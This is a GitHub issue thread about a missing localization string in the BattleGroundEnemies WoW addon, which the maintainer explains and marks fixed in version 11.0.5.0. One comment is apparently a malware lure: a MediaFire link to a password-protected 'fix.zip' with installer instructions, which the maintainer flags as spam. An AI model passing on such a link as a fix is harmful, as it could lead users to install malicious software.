### ISSUE TITLE
Missing localization entry for['PlayerCount_Enabled']  (BGE: 11.0.2.3)

### ISSUE THREAD

**Issue by mty22** [BullseiWoWAddons/BattleGroundEnemies#43]
Hello,

Saw this when I logged in today:

```
[20:22:36] BattleGroundEnemies: Missing localization entry for['PlayerCount_Enabled']. Please report this to the addon author.
```

Addon version: `11.0.2.3`

Game version:
![image](https://github.com/user-attachments/assets/6559cf1a-da66-42d0-bf9b-9a6b16b3dec6)

I had a look at all the releases and couldn't find any reference (thank you for making it easy aligning your releases with the game versions):

https://github.com/BullseiWoWAddons/BattleGroundEnemies/compare/11.0.0.0...11.0.2.3

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bullsei** [comment]
looked like spam from WSA1k, deleted it. 
regarding the message you got. it was due to libgroupinspect error i had to push a new version to pull new library version. Before that i already changed that PlayerCount_Enabled since there are some changes in that regard in the next version. 
long story short message will be gone in next release

**Comment by bullsei** [comment]
fixed in version 11.0.5.0
